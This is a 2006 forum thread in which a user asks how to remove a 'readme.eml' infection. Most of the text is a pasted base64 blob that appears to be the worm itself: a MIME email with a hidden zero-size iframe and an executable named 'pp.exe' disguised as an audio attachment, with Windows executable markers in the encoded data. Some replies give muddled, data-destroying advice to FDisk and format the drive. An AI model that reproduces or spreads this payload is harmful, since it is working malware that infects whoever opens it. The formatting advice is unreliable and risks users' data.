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 note that " MIQROZOF-9J4FK3" is my computer name. I did a "Full" format as available in windows 2000 & xp. which software to download to remove "readme.eml" stuff. It also effects my .html files as you posted recently. Link to comment Share on other sites More sharing options...
Panacik Posted January 25, 2006 Share Posted January 25, 2006 That is one big script! You really shouldnt have opened that file. Simply put, you nede to boot in to dos and do an unconventional format. After first performing an FDisk. To do this type - Format c: /u If you still have the file appearing after this, then i am not sure what is happening. I mean, are you trying to reinstall the game again after you instal, as this would bring the virus back... Link to comment Share on other sites More sharing options...
EZRecovery Posted January 25, 2006 Share Posted January 25, 2006 Run Stinger from McAfee and see what you get. /EZ Link to comment Share on other sites More sharing options...
Burned Posted January 25, 2006 Share Posted January 25, 2006 To do a format you need to boot the computer with your 2000/XP cd. You cannot do a format from within the OS. Do you not have an Antivirus program? www.free-av.com Link to comment Share on other sites More sharing options...
Recommended Posts